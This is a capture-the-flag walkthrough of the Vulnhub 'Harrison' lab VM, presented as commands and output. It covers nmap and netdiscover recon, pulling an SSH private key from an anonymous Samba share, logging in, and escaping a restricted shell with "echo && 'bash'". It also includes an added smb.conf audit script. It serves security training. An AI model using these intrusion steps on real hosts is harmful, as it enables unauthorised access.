Vulnhub: Harrison box walkthrough (privilege escalation not completed)
Harrison
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ce:24:39 1 60 PCS Systemtechnik GmbH
192.168.56.152 08:00:27:3c:68:e7 1 60 PCS Systemtechnik GmbH
Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.152.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.152 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-04 01:32 EST
Nmap scan report for localhost (192.168.56.152)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5b:87:f1:fe:67:8f:a6:ba:8b:75:3c:11:34:3d:b6:b8 (RSA)
| 256 93:87:7e:2e:5e:4e:ce:71:56:a1:1c:6b:fc:1f:6e:55 (ECDSA)
|_ 256 c0:14:c0:24:e8:a8:7e:d4:cd:a6:42:25:f3:48:47:94 (ED25519)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:3C:68:E7 (Oracle VirtualBox virtual NIC)
Service Info: Host: HARRISON; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-01-04T14:32:15
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: harrison
| NetBIOS computer name: HARRISON\x00
| Domain name: \x00
| FQDN: harrison
|_ System time: 2023-01-04T14:32:14+00:00
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 445 (Samba).
Getting a shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ smbclient -L 192.168.56.152
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Private Disk
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.152 failed (Error NT_STATUS_CONNECTION_REFUSED)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ smbclient //192.168.56.152/Private
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> cat flag.txt
cat: command not found
smb: \> get flag.txt
getting file \flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> cd .ssh
smb: \.ssh\> ls
. D 0 Thu Apr 18 12:42:57 2019
.. D 0 Thu Apr 18 12:55:51 2019
authorized_keys N 399 Thu Apr 18 12:42:57 2019
id_rsa A 1679 Thu Apr 18 12:14:17 2019
id_rsa.pub A 399 Thu Apr 18 12:14:17 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (7.5 KiloBytes/sec) (average 4.6 KiloBytes/sec)
smb: \.ssh\> get id_rsa.pub
getting file \.ssh\id_rsa.pub of size 399 as id_rsa.pub (129.9 KiloBytes/sec) (average 5.6 KiloBytes/sec)
smb: \.ssh\> cd ..
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> cd silly_cats
smb: \silly_cats\> ls -alh
NT_STATUS_NO_SUCH_FILE listing \silly_cats\-alh
smb: \silly_cats\> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:55:51 2019
cat3.jpg N 38624 Mon Jan 8 13:30:10 2018
cat1.jpg N 73946 Mon Jan 8 13:29:40 2018
cat2.jpg N 74130 Mon Jan 8 13:29:32 2018
32894736 blocks of size 1024. 27322880 blocks available
smb: \silly_cats\> get cat1.jpg
getting file \silly_cats\cat1.jpg of size 73946 as cat1.jpg (1951.7 KiloBytes/sec) (average 182.5 KiloBytes/sec)
smb: \silly_cats\> get cat2.jpg
getting file \silly_cats\cat2.jpg of size 74130 as cat2.jpg (624.1 KiloBytes/sec) (average 280.4 KiloBytes/sec)
smb: \silly_cats\> get cat3.jpg
getting file \silly_cats\cat3.jpg of size 38624 as cat3.jpg (6286.4 KiloBytes/sec) (average 348.6 KiloBytes/sec)
smb: \silly_cats\> cd ..
smb: \> ls
. D 0 Thu Apr 18 12:55:51 2019
.. D 0 Thu Apr 18 12:12:55 2019
.bash_logout H 220 Wed Apr 4 14:30:26 2018
.profile H 807 Wed Apr 4 14:30:26 2018
.bashrc H 3771 Wed Apr 4 14:30:26 2018
silly_cats D 0 Thu Apr 18 12:55:51 2019
.ssh DH 0 Thu Apr 18 12:42:57 2019
flag.txt N 32 Thu Apr 18 12:14:18 2019
32894736 blocks of size 1024. 27322880 blocks available
smb: \> exit
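The Private share above exports the harrison home directory, including .ssh/id_rsa, to anonymous users. As an added example that is not part of the original write-up, the following script audits a Samba config for exactly that pattern (guest-accessible shares rooted in a home directory, plus signing that is enabled but not required, as nmap reported). The smb.conf text is constructed to mirror the findings and is an assumption, not the box's real file.

```python
# Added audit script (not from the original write-up): flag Samba shares that
# expose a home directory to anonymous users, the weakness behind "Private".
# Constructed smb.conf modelled on the findings; an assumption, not the box's file.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server signing = auto
[Private]
   path = /home/harrison
   guest ok = yes
[backups]
   path = /srv/backups
   valid users = backup
"""

def parse_smb_conf(text):
    # Minimal smb.conf parser: [section] headers, key = value, # or ; comments.
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            conf[section] = {}
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            # Samba parameter names are case-insensitive; normalise spacing too.
            conf[section][" ".join(key.lower().split())] = value.strip()
    return conf

def audit_shares(text):
    # Returns {share_or_global: [issue, ...]} for risky settings.
    conf = parse_smb_conf(text)
    findings = {}
    if conf.get("global", {}).get("server signing", "").lower() not in ("mandatory", "required"):
        findings["global"] = ["SMB signing enabled but not required"]
    for name, opts in conf.items():
        if name == "global":
            continue
        # "guest ok" (alias "public") lets unauthenticated sessions read the share.
        guest = opts.get("guest ok", opts.get("public", "no")).lower() in ("yes", "true", "1")
        path = opts.get("path", "")
        issues = ["anonymous access (guest ok = yes)"] if guest else []
        if path.startswith(("/home/", "/root")):
            issues.append("exports a home directory: " + path)
            if guest:
                issues.append("anonymous readers can fetch ~/.ssh keys and dotfiles")
        if issues:
            findings[name] = issues
    return findings
```

Run it against a real /etc/samba/smb.conf by reading the file into `audit_shares`; an empty result for every share backed by a home directory is the state to aim for.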
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls
authorized_keys cat1.jpg cat2.jpg cat3.jpg flag.txt id_rsa id_rsa.pub nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.91% (133.3 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat2.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ steghide extract -sf cat3.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat2.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.84% (133.2 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ stegseek cat3.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.74% (133.1 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ binwalk cat1.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls
authorized_keys cat1.jpg cat2.jpg cat3.jpg flag.txt id_rsa id_rsa.pub nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ enum4linux 192.168.56.152
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jan 4 01:38:43 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.152 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.152 )===============================
Looking up status of 192.168.56.152
No reply from 192.168.56.152
==================================( Session Check on 192.168.56.152 )==================================
[+] Server 192.168.56.152 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.152 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.152 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.152 from srvinfo:
HARRISON Wk Sv PrQ Unx NT SNT Samba 4.7.6-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.152 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.152 )================================
do_connect: Connection to 192.168.56.152 failed (Error NT_STATUS_CONNECTION_REFUSED)
Sharename Type Comment
--------- ---- -------
Private Disk
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.56.152
//192.168.56.152/Private Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.152/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.152 )===========================
[+] Attaching to 192.168.56.152 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: [Errno Connection error (192.168.56.152:139)] [Errno 111] Connection refused
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HARRISON
[+] Builtin
[+] Password Info for Domain: HARRISON
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.152 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.152 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-216848864-2603756302-216944148 and logon username '', password ''
S-1-5-21-216848864-2603756302-216944148-501 HARRISON\nobody (Local User)
S-1-5-21-216848864-2603756302-216944148-513 HARRISON\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\harrison (Local User)
==============================( Getting printer info for 192.168.56.152 )==============================
No printers returned.
enum4linux complete on Wed Jan 4 01:39:22 2023
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls -alh
total 220K
drwxr-xr-x 2 kali kali 4.0K Jan 4 01:35 .
drwxr-xr-x 8 kali kali 4.0K Jan 4 01:30 ..
-rw-r--r-- 1 kali kali 399 Jan 4 01:35 authorized_keys
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat1.jpg
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat2.jpg
-rw-r--r-- 1 kali kali 38K Jan 4 01:34 cat3.jpg
-rw-r--r-- 1 kali kali 32 Jan 4 01:34 flag.txt
-rw-r--r-- 1 kali kali 1.7K Jan 4 01:34 id_rsa
-rw-r--r-- 1 kali kali 399 Jan 4 01:34 id_rsa.pub
-rw-r--r-- 1 root root 1.6K Jan 4 01:32 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ls -alh
total 220K
drwxr-xr-x 2 kali kali 4.0K Jan 4 01:35 .
drwxr-xr-x 8 kali kali 4.0K Jan 4 01:30 ..
-rw-r--r-- 1 kali kali 399 Jan 4 01:35 authorized_keys
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat1.jpg
-rw-r--r-- 1 kali kali 73K Jan 4 01:34 cat2.jpg
-rw-r--r-- 1 kali kali 38K Jan 4 01:34 cat3.jpg
-rw-r--r-- 1 kali kali 32 Jan 4 01:34 flag.txt
-r-------- 1 kali kali 1.7K Jan 4 01:34 id_rsa
-rw-r--r-- 1 kali kali 399 Jan 4 01:34 id_rsa.pub
-rw-r--r-- 1 root root 1.6K Jan 4 01:32 nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152
The authenticity of host '192.168.56.152 (192.168.56.152)' can't be established.
ED25519 key fingerprint is SHA256:O+XKyphfQuB/KW9A8/6nUKPZTAGMJNtRBH8CrijPGnY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.152' (ED25519) to the list of known hosts.
Welcome to Harrison. Enjoy your shell.
Type '?' or 'help' to get the list of allowed commands
harrison:~$ id
*** forbidden command: id
harrison:~$
But this is a restricted shell.
Check whether specifying a shell directly over SSH can bypass the restriction:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152 /bin/bash
*** forbidden path over SSH: "/bin/bash"
This incident has been reported.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Harrison]
└─$ ssh -i id_rsa harrison@192.168.56.152 /bin/sh
*** forbidden path over SSH: "/bin/sh"
This incident has been reported.
Escape with echo && 'bash'
harrison:~$ echo && 'bash'
harrison@harrison:~$ id
uid=1000(harrison) gid=1000(harrison) groups=1000(harrison),27(sudo),999(docker)
harrison@harrison:~$ sudo -l
bash: sudo: command not found
harrison@harrison:~$ ls
flag.txt silly_cats
harrison@harrison:~$ cd /home
harrison@harrison:/home$ ls
harrison
harrison@harrison:/home$ cd harrison/
harrison@harrison:~$ ls -alh
total 44K
drwxr-xr-x 1 harrison harrison 4.0K Jan 4 14:41 .
drwxr-xr-x 1 root root 4.0K Apr 18 2019 ..
-rw-r--r-- 1 harrison harrison 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 harrison harrison 3.7K Apr 4 2018 .bashrc
drwx------ 2 harrison harrison 4.0K Jan 4 14:40 .cache
-rw------- 1 harrison harrison 8 Jan 4 14:41 .lhistory
-rw-r--r-- 1 harrison harrison 807 Apr 4 2018 .profile
drwxr-xr-x 1 harrison harrison 4.0K Apr 18 2019 .ssh
-rw-r--r-- 1 root root 32 Apr 18 2019 flag.txt
drwxr-xr-x 2 root root 4.0K Apr 18 2019 silly_cats
harrison@harrison:~$ cat flag.txt
It's not going to be that easy.
harrison@harrison:~$
Privilege escalation
Since harrison is a member of the docker group, use docker for privilege escalation.
(not completed)
STRIVE FOR PROGRESS, NOT FOR PERFECTION